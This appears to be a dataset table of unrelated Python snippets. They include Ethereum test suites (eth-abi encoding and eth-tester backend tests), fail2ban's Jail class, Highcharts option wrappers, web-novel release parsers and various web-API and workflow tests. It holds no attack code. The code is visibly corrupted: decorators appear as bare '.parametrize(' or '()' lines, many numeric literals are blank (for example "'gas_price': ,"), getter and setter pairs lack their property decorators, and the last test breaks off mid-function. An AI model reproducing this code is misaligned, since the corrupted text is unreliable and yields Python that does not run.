code stringlengths 281 23.7M |
|---|
.parametrize('name, type_, value, expected', (('atomic_type', 'address', None, {'expected_exception': ValueError, 'match': 'Missing value for field `atomic_type` of type `address`'}), ('non_int_string', 'uint256', 'i am not an int', {'expected_exception': ValueError, 'match': re.escape("invalid literal for int() with base 10: 'i am not an int'")}), ('non_hex_string', 'uint256', '0xi am not an int', {'expected_exception': ValueError, 'match': re.escape("invalid literal for int() with base 10: '0xi am not an int'")}), ('a_string', 'string', [], {'expected_exception': TypeError, 'match': re.escape("Arguments passed as hexstr or text must be of text type. Instead, value was: '[]'")}), ('missing_inner_array', 'string[][]', ['a', 'b', 'c'], {'expected_exception': ValueError, 'match': re.escape("Invalid value for field `missing_inner_array` of type `string[]`: expected array, got `a` of type `<class 'str'>`")})), ids=['None value for atomic type', 'string value that is not convertible to int for int type', 'string starting with 0x that is not convertible to int for int type', 'empty array value for string type', 'string[] value for string[][] type'])
def test_encode_field_fail(name, type_, value, expected):
types = {'Sample': [{'name': 'name', 'type': 'string'}]}
with pytest.raises(**expected):
encode_field(types, name, type_, value) |
class EmptyTransforms(TestCase, Common, Edges):
def setUp(self):
super().setUp()
self.seq = nutils.transformseq.EmptyTransforms(todims=1, fromdims=1)
self.check = ()
self.checkmissing = ((l1, i10), (x1, i14), (r1, i10))
self.checkrefs = References.empty(1)
self.checktodims = 1
self.checkfromdims = 1 |
def extractKashiistoriesBlogspotCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def compare_chrom_names(a_regions, b_regions):
a_chroms = set(a_regions.chromosome.unique())
b_chroms = set(b_regions.chromosome.unique())
if (a_chroms and a_chroms.isdisjoint(b_chroms)):
msg = 'Chromosome names do not match between files'
a_fname = a_regions.meta.get('filename')
b_fname = b_regions.meta.get('filename')
if (a_fname and b_fname):
msg += f' {a_fname} and {b_fname}'
msg += ': {} vs. {}'.format(', '.join(map(repr, sorted(a_chroms)[:3])), ', '.join(map(repr, sorted(b_chroms)[:3])))
raise ValueError(msg)
return (a_chroms, b_chroms) |
def test_sensor_task():
sensor = FileSensor(name='test_sensor')
assert (sensor.task_type == 'sensor')
settings = SerializationSettings(project='project', domain='domain', version='version', env={'FOO': 'baz'}, image_config=ImageConfig(default_image=default_img, images=[default_img]))
assert (sensor.get_custom(settings) == {'sensor_module': 'flytekit.sensor.file_sensor', 'sensor_name': 'FileSensor'})
tmp_file = tempfile.NamedTemporaryFile()
()
def t1():
print('flyte')
def wf():
(sensor(tmp_file.name) >> t1())
if (__name__ == '__main__'):
wf() |
def test_windows_10_64bit_system_details(pml_reader_windows10_64bit):
system_details = pml_reader_windows10_64bit.system_details()
assert (system_details['Computer Name'] == 'DESKTOP-6PCIALL')
assert (system_details['Operating System'] == 'Windows 10 (build 16299.2)')
assert (system_details['System Root'] == 'C:\\Windows')
assert (system_details['Logical Processors'] == 2)
assert (system_details['Memory (RAM)'] == '1.99 GB')
assert (system_details['System Type'] == '64-bit') |
class AutoDecoder(AutoModel[DecoderModule[(TransformerConfig, KeyValueCache)]]):
_base_cls = DecoderModule
_registry = registry.decoders
def from_repo(cls, *, repo: Repository, device: Optional[torch.device]=None, quantization_config: Optional[BitsAndBytesConfig]=None) -> DecoderModule[(TransformerConfig, KeyValueCache)]:
decoder = cls._instantiate_model(repo, device, quantization_config)
assert isinstance(decoder, DecoderModule)
return decoder |
class OptionPlotoptionsSplineSonificationTracksMappingPlaydelay(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def get_labeled_model_data_list_list(label_and_layout_line_list_list: Sequence[Sequence[Tuple[(str, LayoutLine)]]], data_generator: ModelDataGenerator) -> Sequence[Sequence[LabeledLayoutModelData]]:
return [get_labeled_model_data_list(label_and_layout_line_list, data_generator=data_generator) for label_and_layout_line_list in label_and_layout_line_list_list] |
class Jail(object):
_BACKENDS = ['pyinotify', 'polling', 'systemd']
def __init__(self, name, backend='auto', db=None):
self.__db = db
if (len(name) >= 26):
logSys.warning(('Jail name %r might be too long and some commands might not function correctly. Please shorten' % name))
self.__name = name
self.__queue = queue.Queue()
self.__filter = None
self._banExtra = {}
logSys.info(("Creating new jail '%s'" % self.name))
if (backend is not None):
self._setBackend(backend)
self.backend = backend
def __repr__(self):
return ('%s(%r)' % (self.__class__.__name__, self.name))
def _setBackend(self, backend):
(backend, beArgs) = extractOptions(backend)
backend = backend.lower()
backends = self._BACKENDS
if (backend != 'auto'):
if (not (backend in self._BACKENDS)):
logSys.error(("Unknown backend %s. Must be among %s or 'auto'" % (backend, backends)))
raise ValueError(("Unknown backend %s. Must be among %s or 'auto'" % (backend, backends)))
backends = backends[backends.index(backend):]
for b in backends:
initmethod = getattr(self, ('_init%s' % b.capitalize()))
try:
initmethod(**beArgs)
if ((backend != 'auto') and (b != backend)):
logSys.warning(('Could only initiated %r backend whenever %r was requested' % (b, backend)))
else:
logSys.info(('Initiated %r backend' % b))
self.__actions = Actions(self)
return
except ImportError as e:
logSys.log((logging.DEBUG if (backend == 'auto') else logging.ERROR), ('Backend %r failed to initialize due to %s' % (b, e)))
logSys.error(('Failed to initialize any backend for Jail %r' % self.name))
raise RuntimeError(('Failed to initialize any backend for Jail %r' % self.name))
def _initPolling(self, **kwargs):
from .filterpoll import FilterPoll
logSys.info(("Jail '%s' uses poller %r" % (self.name, kwargs)))
self.__filter = FilterPoll(self, **kwargs)
def _initPyinotify(self, **kwargs):
from .filterpyinotify import FilterPyinotify
logSys.info(("Jail '%s' uses pyinotify %r" % (self.name, kwargs)))
self.__filter = FilterPyinotify(self, **kwargs)
def _initSystemd(self, **kwargs):
from .filtersystemd import FilterSystemd
logSys.info(("Jail '%s' uses systemd %r" % (self.name, kwargs)))
self.__filter = FilterSystemd(self, **kwargs)
def name(self):
return self.__name
def database(self):
return self.__db
def database(self, value):
self.__db = value
def filter(self):
return self.__filter
def actions(self):
return self.__actions
def idle(self):
return (self.filter.idle or self.actions.idle)
def idle(self, value):
self.filter.idle = value
self.actions.idle = value
def status(self, flavor='basic'):
return [('Filter', self.filter.status(flavor=flavor)), ('Actions', self.actions.status(flavor=flavor))]
def hasFailTickets(self):
return (not self.__queue.empty())
def putFailTicket(self, ticket):
self.__queue.put(ticket)
def getFailTicket(self):
try:
ticket = self.__queue.get(False)
return ticket
except queue.Empty:
return False
def setBanTimeExtra(self, opt, value):
be = self._banExtra
if (value == ''):
value = None
if (value is not None):
be[opt] = value
elif (opt in be):
del be[opt]
logSys.info('Set banTime.%s = %s', opt, value)
if (opt == 'increment'):
be[opt] = _as_bool(value)
if (be.get(opt) and (self.database is None)):
logSys.warning('ban time increment is not available as long jail database is not set')
if (opt in ['maxtime', 'rndtime']):
if (not (value is None)):
be[opt] = MyTime.str2seconds(value)
if ((opt in ['formula', 'factor', 'maxtime', 'rndtime', 'multipliers']) or (be.get('evformula', None) is None)):
if (opt == 'multipliers'):
be['evmultipliers'] = [int(i) for i in (value.split(' ') if ((value is not None) and (value != '')) else [])]
multipliers = be.get('evmultipliers', [])
banFactor = eval(be.get('factor', '1'))
if len(multipliers):
evformula = (lambda ban, banFactor=banFactor: ((ban.Time * banFactor) * multipliers[(ban.Count if (ban.Count < len(multipliers)) else (- 1))]))
else:
formula = be.get('formula', 'ban.Time * (1<<(ban.Count if ban.Count<20 else 20)) * banFactor')
formula = compile(formula, '~inline-conf-expr~', 'eval')
evformula = (lambda ban, banFactor=banFactor, formula=formula: max(ban.Time, eval(formula)))
if (not (be.get('maxtime', None) is None)):
maxtime = be['maxtime']
evformula = (lambda ban, evformula=evformula: min(evformula(ban), maxtime))
if (not (be.get('rndtime', None) is None)):
rndtime = be['rndtime']
evformula = (lambda ban, evformula=evformula: (evformula(ban) + (random.random() * rndtime)))
be['evformula'] = evformula
def getBanTimeExtra(self, opt=None):
if (opt is not None):
return self._banExtra.get(opt, None)
return self._banExtra
def getMaxBanTime(self):
return (self._banExtra.get('maxtime', (- 1)) if self._banExtra.get('increment') else self.actions.getBanTime())
def restoreCurrentBans(self, correctBanTime=True):
try:
if (self.database is not None):
if self._banExtra.get('increment'):
forbantime = None
if correctBanTime:
correctBanTime = self.getMaxBanTime()
else:
forbantime = self.actions.getBanTime()
for ticket in self.database.getCurrentBans(jail=self, forbantime=forbantime, correctBanTime=correctBanTime, maxmatches=self.filter.failManager.maxMatches):
try:
if self.filter._inIgnoreIPList(ticket.getID(), ticket):
continue
ticket.restored = True
btm = ticket.getBanTime(forbantime)
diftm = (MyTime.time() - ticket.getTime())
if ((btm != (- 1)) and (diftm > 0)):
btm -= diftm
if ((btm != (- 1)) and (btm <= 0)):
continue
self.putFailTicket(ticket)
except Exception as e:
logSys.error('Restore ticket failed: %s', e, exc_info=(logSys.getEffectiveLevel() <= logging.DEBUG))
except Exception as e:
logSys.error('Restore bans failed: %s', e, exc_info=(logSys.getEffectiveLevel() <= logging.DEBUG))
def start(self):
logSys.debug('Starting jail %r', self.name)
self.filter.start()
self.actions.start()
self.restoreCurrentBans()
logSys.info('Jail %r started', self.name)
def stop(self, stop=True, join=True):
if stop:
logSys.debug('Stopping jail %r', self.name)
for obj in (self.filter, self.actions):
try:
if stop:
obj.stop()
if join:
obj.join()
except Exception as e:
logSys.error('Stop %r of jail %r failed: %s', obj, self.name, e, exc_info=(logSys.getEffectiveLevel() <= logging.DEBUG))
if join:
logSys.info('Jail %r stopped', self.name)
def isAlive(self):
return (self.filter.isAlive() or self.actions.isAlive()) |
class OptionSeriesPieSonificationTracksMappingLowpassFrequency(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def extractFujotalkWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def test_lifespan_sync(test_client_factory):
startup_complete = False
shutdown_complete = False
def hello_world(request):
return PlainTextResponse('hello, world')
def run_startup():
nonlocal startup_complete
startup_complete = True
def run_shutdown():
nonlocal shutdown_complete
shutdown_complete = True
with pytest.deprecated_call(match='The on_startup and on_shutdown parameters are deprecated'):
app = Router(on_startup=[run_startup], on_shutdown=[run_shutdown], routes=[Route('/', hello_world)])
assert (not startup_complete)
assert (not shutdown_complete)
with test_client_factory(app) as client:
assert startup_complete
assert (not shutdown_complete)
client.get('/')
assert startup_complete
assert shutdown_complete |
def test_correct_response(client, monkeypatch, elasticsearch_transaction_index, awards_and_transactions):
setup_elasticsearch_test(monkeypatch, elasticsearch_transaction_index)
resp = client.post('/api/v2/search/spending_by_category/cfda', content_type='application/json', data=json.dumps({'filters': {'time_period': [{'start_date': '2018-10-01', 'end_date': '2020-09-30'}]}}))
expected_response = {'category': 'cfda', 'limit': 10, 'page_metadata': {'page': 1, 'next': None, 'previous': None, 'hasNext': False, 'hasPrevious': False}, 'results': [{'amount': 550.0, 'code': '20.200', 'id': 200, 'name': 'CFDA 2'}, {'amount': 5.0, 'code': '10.100', 'id': 100, 'name': 'CFDA 1'}], 'messages': [get_time_period_message()]}
assert (resp.status_code == status.HTTP_200_OK), 'Failed to return 200 Response'
assert (resp.json() == expected_response) |
class ModelInformer(BaseAction):
def __init__(self, model_id, config_json):
BaseAction.__init__(self, model_id=model_id, config_json=config_json, credentials_json=None)
self.information_file = os.path.join(self._dest_dir, self.model_id, INFORMATION_FILE)
def _write_information_json(self):
data = Information(model_id=self.model_id, config_json=self.config_json).get()
with open(self.information_file, 'w') as f:
json.dump(data, f, indent=4)
def _add_info_api(self):
sf = ServiceFile(path=os.path.join(self._get_bundle_location(self.model_id), self.model_id))
sf.add_info_api(information_file=self.information_file)
def inform(self):
self._write_information_json()
self._add_info_api() |
class BaseTestBackendDirect():
def _send_and_check_transaction(self, eth_tester, test_transaction, _from):
transaction = assoc(test_transaction, 'from', _from)
txn_hash = eth_tester.send_transaction(transaction)
txn = eth_tester.get_transaction_by_hash(txn_hash)
self._check_transactions(transaction, txn)
def _check_transactions(sent_transaction, actual_transaction):
assert is_same_address(actual_transaction['from'], sent_transaction['from'])
if (('to' not in sent_transaction) or (sent_transaction['to'] == '')):
assert (actual_transaction['to'] == '')
else:
assert is_same_address(actual_transaction['to'], sent_transaction['to'])
assert (actual_transaction['gas'] == sent_transaction['gas'])
assert (actual_transaction['value'] == sent_transaction['value'])
if (sent_transaction.get('gas_price') is not None):
assert (actual_transaction['gas_price'] == sent_transaction['gas_price'])
else:
assert (actual_transaction['max_fee_per_gas'] == sent_transaction['max_fee_per_gas'])
assert (actual_transaction['max_priority_fee_per_gas'] == sent_transaction['max_priority_fee_per_gas'])
supports_evm_execution = True
def skip_if_no_evm_execution(self):
if (not self.supports_evm_execution):
pytest.skip('EVM Execution is not supported.')
def test_get_accounts(self, eth_tester):
accounts = eth_tester.get_accounts()
assert accounts
assert all((is_address(account) for account in accounts))
def test_add_account_no_password(self, eth_tester):
account = eth_tester.add_account(PK_A)
assert is_address(account)
assert any((is_same_address(account, value) for value in eth_tester.get_accounts()))
eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': account, 'value': (1 * denoms.ether), 'gas': 21000, 'gas_price': NON_DEFAULT_GAS_PRICE})
self._send_and_check_transaction(eth_tester, SIMPLE_TRANSACTION, account)
def test_add_account_with_password(self, eth_tester):
account = eth_tester.add_account(PK_A, 'test-password')
assert is_address(account)
assert any((is_same_address(account, value) for value in eth_tester.get_accounts()))
eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': account, 'value': (1 * denoms.ether), 'gas': 21000, 'gas_price': NON_DEFAULT_GAS_PRICE})
with pytest.raises(AccountLocked):
self._send_and_check_transaction(eth_tester, SIMPLE_TRANSACTION, account)
eth_tester.unlock_account(account, 'test-password')
self._send_and_check_transaction(eth_tester, SIMPLE_TRANSACTION, account)
eth_tester.lock_account(account)
with pytest.raises(AccountLocked):
self._send_and_check_transaction(eth_tester, SIMPLE_TRANSACTION, account)
def test_get_balance_of_listed_accounts(self, eth_tester):
for account in eth_tester.get_accounts():
balance = eth_tester.get_balance(account)
assert is_integer(balance)
assert (balance >= UINT256_MIN)
assert (balance <= UINT256_MAX)
def test_get_code_account_with_code(self, eth_tester):
self.skip_if_no_evm_execution()
emitter_address = _deploy_emitter(eth_tester)
code = eth_tester.get_code(emitter_address)
assert (code == '0xe060020abb563dc0cf0256eb41d8b146101ca5780639caa6fde17bfa9575b005bffa95e6e2a182411e7a6f9ed114a85c3761d87f9b8f453d842c71235aa64fff99ff0104600fffaba15b50565ba577f1e86022f78f8d04f8e3dfd13a2bdb280403e6632877c0dbee5e4eeb259908a5cabacff039d147f23fe975a4254bdf6b1502b8c79132ae1833986b7ccef2638e73fdf991a15bbdfdf0cb1dea99afceb3ea698d62e705b736f1345a7eee9eb07e63d1f8f556c1bca15bbaf4a25b279c7c585f25eda9788ac9420ebadae78ca6b206a0e6ab488fd81fa15bbf56d2ef3c5228bf5de325a4672ab50e033749a601e4f4a5e1dce905da15b5050565bff532fd6ea96cfb78bb46e09279a26828b8b493de1a2b8b1ee1face527978a15af0104600fffaa150565bdabb600bdfa30ece802b64cd2b7e57dabf4010aabf5df26d1556977affb07b98a77ad955ba36101c3565bff057bc32826fbe161da1c110afcdcae7c109a8b69149f727fc37a603c60ef94caabdab600adff16c999b533366ca5138d78e85dacd05749f098d6c225d4cd42ee6ecaba57807ff70fe689e290d8ce2b2a388ac28db36fbb0e16a6d89c6804c461f65a1b40bba26102a5565bda16102a556')
def test_get_code_account_without_code(self, eth_tester):
code = eth_tester.get_code(BURN_ADDRESS)
assert (code == '0x')
def test_get_nonce(self, eth_tester):
for account in eth_tester.get_accounts():
nonce = eth_tester.get_nonce(account)
assert is_integer(nonce)
assert (nonce >= UINT256_MIN)
assert (nonce <= UINT256_MAX)
.parametrize('block_count,newest_block,reward_percentiles,expected', [[3, 'latest', [], {'base_fee_per_gas': [, , ], 'gas_used_ratio': [0.0, 0.0, 0.0], 'reward': []}], [1, 'safe', [], {'base_fee_per_gas': [], 'gas_used_ratio': [0.0], 'reward': []}], [1, 'finalized', [], {'base_fee_per_gas': [], 'gas_used_ratio': [0.0], 'reward': []}], [1, 'earliest', [], {'base_fee_per_gas': [], 'gas_used_ratio': [], 'reward': []}], [1, 'pending', [], {'base_fee_per_gas': [], 'gas_used_ratio': [0.0], 'reward': []}]])
def test_get_fee_history(self, eth_tester, block_count, newest_block, reward_percentiles, expected):
self.skip_if_no_evm_execution()
eth_tester.mine_blocks(10)
fee_history = eth_tester.get_fee_history(block_count, newest_block, reward_percentiles)
assert (fee_history['oldest_block'] == 1)
assert (fee_history['base_fee_per_gas'] == expected['base_fee_per_gas'])
assert (fee_history['gas_used_ratio'] == expected['gas_used_ratio'])
assert (fee_history['reward'] == expected['reward'])
.parametrize('block_count,newest_block,reward_percentiles,error,message', [[1, None, None, BlockNotFound, 'No block found for block number: None'], [0, None, None, ValidationError, 'block_count must be between 1 and 1024']])
def test_get_fee_history_fails(self, eth_tester, block_count, newest_block, reward_percentiles, error, message):
self.skip_if_no_evm_execution()
eth_tester.mine_blocks(10)
with pytest.raises(error, match=message):
eth_tester.get_fee_history(block_count, newest_block, reward_percentiles)
def test_mine_block_single(self, eth_tester):
eth_tester.mine_blocks()
before_block_number = eth_tester.get_block_by_number('latest')['number']
eth_tester.mine_blocks()
after_block_number = eth_tester.get_block_by_number('latest')['number']
assert is_integer(before_block_number)
assert is_integer(after_block_number)
assert (before_block_number == (after_block_number - 1))
def test_mine_multiple_blocks(self, eth_tester):
eth_tester.mine_blocks()
before_block_number = eth_tester.get_block_by_number('latest')['number']
eth_tester.mine_blocks(10)
after_block_number = eth_tester.get_block_by_number('latest')['number']
assert is_integer(before_block_number)
assert is_integer(after_block_number)
assert (before_block_number == (after_block_number - 10))
def test_gas_limit_constant(self, eth_tester):
eth_tester.mine_blocks()
before_gas_limit = eth_tester.get_block_by_number('latest')['gas_limit']
eth_tester.mine_blocks()
after_gas_limit = eth_tester.get_block_by_number('latest')['gas_limit']
assert (before_gas_limit == after_gas_limit)
.parametrize('is_pending', [True, False])
def test_send_raw_transaction_valid_raw_transaction(self, eth_tester, is_pending):
raw_privkey = (b'\x11' * 32)
test_key = keys.PrivateKey(raw_privkey)
eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': test_key.public_key.to_checksum_address(), 'gas': 21000, 'value': (1 * denoms.ether)})
transaction_hex = '0xfb9acae7e376e7c213b7e7e7e46cc70a5dd086daff2aba0b101c1f9dc0c588c0194a1093f06e6b30d1fd16d31014ef5851311b7bfbf419ea01cfa8757b7863a630ef7491c62b03d9cd9dff395f61b5df500cc665f0fa5b027'
if is_pending:
eth_tester.disable_auto_mine_transactions()
transaction_hash = eth_tester.send_raw_transaction(transaction_hex)
if is_pending:
with pytest.raises(TransactionNotFound):
eth_tester.get_transaction_receipt(transaction_hash)
eth_tester.enable_auto_mine_transactions()
receipt = eth_tester.get_transaction_receipt(transaction_hash)
assert (receipt['transaction_hash'] == transaction_hash)
def test_send_raw_transaction_invalid_rlp_transaction(self, eth_tester):
self.skip_if_no_evm_execution()
invalid_transaction_hex = '0x1234'
import eth
with pytest.raises(eth.exceptions.UnrecognizedTransactionType):
eth_tester.send_raw_transaction(invalid_transaction_hex)
def test_send_raw_transaction_invalid_raw_transaction(self, eth_tester):
self.skip_if_no_evm_execution()
invalid_transaction_hex = '0xffff'
with pytest.raises(rlp.exceptions.DecodingError):
eth_tester.send_raw_transaction(invalid_transaction_hex)
.parametrize('test_transaction', (SIMPLE_TRANSACTION, TRANSACTION_WTH_NONCE, CONTRACT_TRANSACTION_EMPTY_TO, CONTRACT_TRANSACTION_MISSING_TO), ids=['Simple transaction', 'Transaction with nonce', 'Create Contract - empty to', 'Create Contract - missing to'])
def test_send_transaction(self, eth_tester, test_transaction):
accounts = eth_tester.get_accounts()
assert accounts, 'No accounts available for transaction sending'
self._send_and_check_transaction(eth_tester, test_transaction, accounts[0])
def test_send_transaction_raises_with_legacy_and_dynamic_fee_fields(self, eth_tester):
accounts = eth_tester.get_accounts()
assert accounts, 'No accounts available for transaction sending'
test_transaction = {'to': accounts[0], 'from': accounts[0], 'value': 1, 'gas': 21000, 'gas_price': , 'max_fee_per_gas': , 'max_priority_fee_per_gas': }
with pytest.raises(ValidationError, match='legacy and dynamic fee transaction values'):
self._send_and_check_transaction(eth_tester, test_transaction, accounts[0])
def test_send_transaction_no_gas_price_or_dynamic_fees(self, eth_tester):
accounts = eth_tester.get_accounts()
assert accounts, 'No accounts available for transaction sending'
test_transaction = dissoc(SIMPLE_TRANSACTION, 'gas_price')
test_transaction = assoc(test_transaction, 'from', accounts[0])
txn_hash = eth_tester.send_transaction(test_transaction)
sent_transaction = eth_tester.get_transaction_by_hash(txn_hash)
assert (sent_transaction.get('type') == '0x2')
assert (sent_transaction.get('max_fee_per_gas') == )
assert (sent_transaction.get('max_priority_fee_per_gas') == )
assert (sent_transaction.get('access_list') == ())
assert (sent_transaction.get('gas_price') == )
def test_send_access_list_transaction(self, eth_tester):
accounts = eth_tester.get_accounts()
assert accounts, 'No accounts available for transaction sending'
access_list_transaction = {'chain_id': , 'from': accounts[0], 'to': accounts[0], 'value': 1, 'gas': 40000, 'gas_price': , 'access_list': ()}
txn_hash = eth_tester.send_transaction(access_list_transaction)
txn = eth_tester.get_transaction_by_hash(txn_hash)
assert (txn.get('type') == '0x1')
assert (txn.get('access_list') == ())
self._check_transactions(access_list_transaction, txn)
access_list_transaction['access_list'] = ({'address': '0xde0b295669a9fd93d5f28d9ec85e40f4cb697bae', 'storage_keys': ('0x', '0x')}, {'address': '0xbb9bc244d798123fde783fcc1c72d3bb8c189413', 'storage_keys': ()})
txn_hash = eth_tester.send_transaction(access_list_transaction)
txn = eth_tester.get_transaction_by_hash(txn_hash)
assert (txn.get('type') == '0x1')
assert (txn.get('access_list') != ())
self._check_transactions(access_list_transaction, txn)
def test_send_dynamic_fee_transaction(self, eth_tester):
accounts = eth_tester.get_accounts()
assert accounts, 'No accounts available for transaction sending'
dynamic_fee_transaction = {'chain_id': , 'from': accounts[0], 'to': accounts[0], 'value': 1, 'gas': 40000, 'max_fee_per_gas': , 'max_priority_fee_per_gas': }
txn_hash = eth_tester.send_transaction(dynamic_fee_transaction)
txn = eth_tester.get_transaction_by_hash(txn_hash)
assert (txn.get('type') == '0x2')
assert (txn.get('access_list') == ())
self._check_transactions(dynamic_fee_transaction, txn)
dynamic_fee_transaction['access_list'] = ({'address': '0xde0b295669a9fd93d5f28d9ec85e40f4cb697bae', 'storage_keys': ('0x', '0x')}, {'address': '0xbb9bc244d798123fde783fcc1c72d3bb8c189413', 'storage_keys': ()})
txn_hash = eth_tester.send_transaction(dynamic_fee_transaction)
txn = eth_tester.get_transaction_by_hash(txn_hash)
assert (txn.get('type') == '0x2')
assert (txn.get('access_list') != ())
self._check_transactions(dynamic_fee_transaction, txn)
def test_block_number_auto_mine_transactions_enabled(self, eth_tester):
eth_tester.mine_blocks()
eth_tester.enable_auto_mine_transactions()
before_block_number = eth_tester.get_block_by_number('latest')['number']
eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
after_block_number = eth_tester.get_block_by_number('latest')['number']
assert (before_block_number == (after_block_number - 1))
def test_auto_mine_transactions_disabled_block_number(self, eth_tester):
eth_tester.mine_blocks()
eth_tester.disable_auto_mine_transactions()
before_block_number = eth_tester.get_block_by_number('latest')['number']
eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
after_block_number = eth_tester.get_block_by_number('latest')['number']
assert (before_block_number == after_block_number)
def test_auto_mine_transactions_disabled_replace_transaction(self, eth_tester):
eth_tester.mine_blocks()
eth_tester.disable_auto_mine_transactions()
transaction = {'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'value': 1, 'gas': 21000, 'nonce': 0}
try:
eth_tester.send_transaction(transaction)
transaction['value'] = 2
eth_tester.send_transaction(transaction)
except Exception:
pytest.fail('Sending replacement transaction caused exception')
def test_auto_mine_transactions_disabled_multiple_accounts(self, eth_tester):
eth_tester.mine_blocks()
eth_tester.disable_auto_mine_transactions()
tx1 = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'value': 1, 'gas': 21000, 'nonce': 0})
tx2 = eth_tester.send_transaction({'from': eth_tester.get_accounts()[1], 'to': BURN_ADDRESS, 'value': 1, 'gas': 21000, 'nonce': 0})
assert (tx1 == eth_tester.get_transaction_by_hash(tx1)['hash'])
assert (tx2 == eth_tester.get_transaction_by_hash(tx2)['hash'])
tx2_replacement = eth_tester.send_transaction({'from': eth_tester.get_accounts()[1], 'to': BURN_ADDRESS, 'value': 2, 'gas': 21000, 'nonce': 0})
assert (tx1 == eth_tester.get_transaction_by_hash(tx1)['hash'])
assert (tx2_replacement == eth_tester.get_transaction_by_hash(tx2_replacement)['hash'])
with pytest.raises(TransactionNotFound):
eth_tester.get_transaction_by_hash(tx2)
def test_auto_mine_transactions_disabled_returns_hashes_when_enabled(self, eth_tester):
self.skip_if_no_evm_execution()
eth_tester.mine_blocks()
eth_tester.disable_auto_mine_transactions()
tx1 = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'value': 1, 'gas': 21000, 'nonce': 0})
tx2 = eth_tester.send_transaction({'from': eth_tester.get_accounts()[1], 'to': BURN_ADDRESS, 'value': 1, 'gas': 21000, 'nonce': 0})
tx2_replacement = eth_tester.send_transaction({'from': eth_tester.get_accounts()[1], 'to': BURN_ADDRESS, 'value': 2, 'gas': 21000, 'nonce': 0})
sent_transactions = eth_tester.enable_auto_mine_transactions()
assert (sent_transactions == [tx1, tx2_replacement])
.parametrize('test_transaction', (SIMPLE_TRANSACTION, CONTRACT_TRANSACTION_EMPTY_TO, CONTRACT_TRANSACTION_MISSING_TO), ids=['Simple transaction', 'Create Contract - empty to', 'Create Contract - missing to'])
def test_manual_mine_pending_transactions(self, eth_tester, test_transaction):
accounts = eth_tester.get_accounts()
assert accounts, 'No accounts available for transaction sending'
complete_transaction = assoc(test_transaction, 'from', accounts[0])
self.skip_if_no_evm_execution()
eth_tester.mine_blocks()
eth_tester.disable_auto_mine_transactions()
txn_hash = eth_tester.send_transaction(complete_transaction)
with pytest.raises(TransactionNotFound):
eth_tester.get_transaction_receipt(txn_hash)
pending_transaction = eth_tester.get_transaction_by_hash(txn_hash)
self._check_transactions(complete_transaction, pending_transaction)
eth_tester.mine_block()
receipt = eth_tester.get_transaction_receipt(txn_hash)
assert (receipt['transaction_hash'] == txn_hash)
assert receipt['block_number']
mined_transaction = eth_tester.get_transaction_by_hash(txn_hash)
self._check_transactions(complete_transaction, mined_transaction)
def test_get_genesis_block_by_number(self, eth_tester):
block = eth_tester.get_block_by_number(0)
assert (block['number'] == 0)
_validate_serialized_block(block)
def test_get_genesis_block_by_hash(self, eth_tester):
genesis_hash = eth_tester.get_block_by_number(0)['hash']
block = eth_tester.get_block_by_hash(genesis_hash)
assert (block['number'] == 0)
_validate_serialized_block(block)
def test_get_block_by_number(self, eth_tester):
origin_block_number = eth_tester.get_block_by_number('pending')['number']
mined_block_hashes = eth_tester.mine_blocks(10)
for (offset, block_hash) in enumerate(mined_block_hashes):
block_number = (origin_block_number + offset)
block = eth_tester.get_block_by_number(block_number)
assert (block['number'] == block_number)
assert (block['hash'] == block_hash)
_validate_serialized_block(block)
def test_get_block_by_number_full_transactions(self, eth_tester):
eth_tester.mine_blocks(2)
transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
transaction = eth_tester.get_transaction_by_hash(transaction_hash)
block = eth_tester.get_block_by_number(transaction['block_number'], full_transactions=True)
assert is_dict(block['transactions'][0])
def test_get_block_by_number_only_transaction_hashes(self, eth_tester):
eth_tester.mine_blocks(2)
transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
transaction = eth_tester.get_transaction_by_hash(transaction_hash)
block = eth_tester.get_block_by_number(transaction['block_number'], full_transactions=False)
assert is_hex(block['transactions'][0])
def test_get_block_by_hash(self, eth_tester):
origin_block_number = eth_tester.get_block_by_number('pending')['number']
mined_block_hashes = eth_tester.mine_blocks(10)
for (offset, block_hash) in enumerate(mined_block_hashes):
block_number = (origin_block_number + offset)
block = eth_tester.get_block_by_hash(block_hash)
assert (block['number'] == block_number)
